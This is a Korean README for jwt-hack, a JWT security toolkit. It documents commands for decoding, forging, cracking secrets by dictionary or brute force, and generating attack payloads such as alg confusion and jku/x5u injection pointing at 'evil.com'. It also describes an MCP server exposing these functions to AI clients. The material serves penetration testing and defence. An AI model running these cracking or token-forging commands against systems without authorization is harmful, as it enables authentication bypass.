
JSON 웹 토큰 해킹 툴킷
JSON Web Token 해킹 툴킷
JSON Web Token을 테스트, 분석, 공격하기 위한 고성능 툴킷입니다.
cargo install jwt-hack
brew install jwt-hack
sudo snap install jwt-hack
choco install jwt-hack
git clone https://github.com/hahwul/jwt-hack
cd jwt-hack
cargo install --path .
docker pull ghcr.io/hahwul/jwt-hack:latest
docker pull hahwul/jwt-hack:v2.6.0
| 모드 | 설명 | 지원 |
|---|---|---|
| Encode | JWT/JWE 인코더 | Secret 기반 / Key 기반 / 알고리즘 / 사용자 정의 헤더 / DEFLATE 압축 / JWE |
| Decode | JWT/JWE 디코더 | 알고리즘, 발급 시각 확인, DEFLATE 압축, JWE 구조 |
| Verify | JWT 검증기 | Secret 기반 / Key 기반 (비대칭 알고리즘용) |
| Crack | Secret 크래커 | 사전 공격 / 무차별 대입 / DEFLATE 압축 |
| Payload | JWT 공격 페이로드 생성기 | none / jku&x5u / alg_confusion (--public-key로 서명) / kid & 클레임 주입 / 클레임 변조 / 서명 가변성 / JWE 프로브 / x5c / cty |
| Scan | 취약점 스캐너 | 일반적인 JWT 취약점에 대한 자동 보안 검사 |
| Server | API 서버 | API 서버 모드 실행 (http://localhost:3000) |
| MCP | Model Context Protocol 서버 | 표준화된 프로토콜을 통한 AI 모델 통합 |
일반 JWT와 DEFLATE로 압축된 JWT 모두 디코딩할 수 있습니다. 이 도구는 압축된 토큰을 자동으로 감지하고 압축을 해제합니다.
jwt-hack decode eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxMjM0In0.CHANGED
jwt-hack decode COMPRESSED_JWT_TOKEN
JWE (JSON Web Encryption) 토큰을 디코딩하여 구조를 분석합니다. 이 도구는 JWE 형식(5개 부분)을 자동으로 감지하고 암호화 세부 정보를 표시합니다.
# Decode JWE token structure
jwt-hack decode eyJhbGciOiJkaXIiLCJlbmMiOiJBMjU2R0NNIn0..ZHVtbXlfaXZfMTIzNDU2.eyJ0ZXN0IjoiandlIn0.ZHVtbXlfdGFn
# Shows JWE header, encrypted key, IV, ciphertext, and authentication tag
jwt-hack encode '{"sub":"1234"}' --secret=your-secret
--compress 옵션을 사용하여 JWT 페이로드에 DEFLATE 압축을 적용할 수 있습니다.
jwt-hack encode '{"sub":"1234"}' --secret=your-secret --compress
# With Private Key
ssh-keygen -t rsa -b 4096 -E SHA256 -m PEM -P "" -f RS256.key
jwt-hack encode '{"a":"z"}' --private-key RS256.key --algorithm=RS256
암호화된 JWT 시나리오를 테스트하기 위한 JWE (JSON Web Encryption) 토큰을 생성합니다.
# Basic JWE encoding
jwt-hack encode '{"sub":"1234", "data":"encrypted"}' --jwe --secret=your-secret
# JWE tokens are encrypted and can only be decrypted with the proper key
jwt-hack encode '{"sensitive":"data"}' --jwe
제공된 secret 또는 key를 사용하여 JWT의 서명이 유효한지 확인합니다.
# With Secret (HMAC algorithms like HS256, HS384, HS512)
jwt-hack verify YOUR_JWT_TOKEN_HERE --secret=your-256-bit-secret
# With Private Key (for asymmetric algorithms like RS256, ES256, EdDSA)
jwt-hack verify YOUR_JWT_TOKEN_HERE --private-key path/to/your/RS256_private.key
사전 공격과 무차별 대입 공격은 DEFLATE로 압축된 JWT도 지원합니다.
# Dictionary attack
jwt-hack crack -w wordlist.txt JWT_TOKEN
jwt-hack crack -w wordlist.txt COMPRESSED_JWT_TOKEN
# Bruteforce attack
jwt-hack crack -m brute JWT_TOKEN --max=4
jwt-hack crack -m brute COMPRESSED_JWT_TOKEN --max=4
jwt-hack payload JWT_TOKEN --jwk-attack evil.com --jwk-trust trusted.com
JWT 토큰의 일반적인 보안 문제와 취약점을 자동으로 스캔합니다.
# Full scan including weak secret detection and payload generation
jwt-hack scan JWT_TOKEN
# Skip secret cracking for faster results
jwt-hack scan JWT_TOKEN --skip-crack
# Skip payload generation
jwt-hack scan JWT_TOKEN --skip-payloads
# Use custom wordlist for weak secret detection
jwt-hack scan JWT_TOKEN -w custom_wordlist.txt
# Limit secret testing attempts
jwt-hack scan JWT_TOKEN --max-crack-attempts 50
scan 명령은 다음을 확인합니다:
자동화 및 통합을 위한 로컬 REST API를 시작합니다. 인증을 요구하려면 --api-key를 사용하고 요청에 X-API-KEY를 포함하세요.
# Start on localhost:3000 with API key protection
jwt-hack server --api-key your-api-key
# Example request (must include X-API-KEY when --api-key is set)
curl -s http://127.0.0.1:3000/health -H 'X-API-KEY: your-api-key'
jwt-hack은 MCP 서버로 실행될 수 있어, AI 모델이 표준화된 프로토콜을 통해 JWT 기능과 상호작용할 수 있습니다.
# Start MCP server (communicates via stdio)
jwt-hack mcp
MCP 서버는 다음 도구를 제공합니다:
| 도구 | 설명 | 매개변수 |
|---|---|---|
decode | JWT 토큰 디코딩 | token (string) |
encode | JSON을 JWT로 인코딩 | json (string), secret (optional), algorithm (default: HS256), no_signature (boolean) |
verify | JWT 서명 검증 | token (string), secret (optional), validate_exp (boolean) |
crack | JWT 토큰 크래킹 | token (string), mode (dict/brute), chars (string), max (number) |
payload | 공격 페이로드 생성 | token (string), target (string), jwk_attack (optional), jwk_protocol (default: https), public_key (optional PEM/path for signed alg-confusion) |
MCP 서버는 AI 모델과 MCP 클라이언트가 사용하도록 설계되었습니다. 각 도구는 JSON 매개변수를 받아 구조화된 응답을 반환합니다.
Decode 도구:
{
"name": "decode",
"arguments": {
"token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
}
}
Encode 도구:
{
"name": "encode",
"arguments": {
"json": "{\"sub\":\"1234\",\"name\":\"test\"}",
"secret": "mysecret",
"algorithm": "HS256"
}
}
jwt-hack의 MCP 서버를 널리 사용되는 MCP 지원 클라이언트에 연결할 수 있습니다. jwt-hack 바이너리가 시스템에 있고 클라이언트에서 접근 가능한지 확인하세요.
VSCode
{
"servers": {
"jwt-hack": {
"type": "stdio",
"command": "jwt-hack",
"args": [
"mcp"
]
}
},
"inputs": []
}
Claude Desktop
{
"mcpServers": {
"jwt-hack": {
"command": "jwt-hack",
"args": ["mcp"],
"env": {}
}
}
}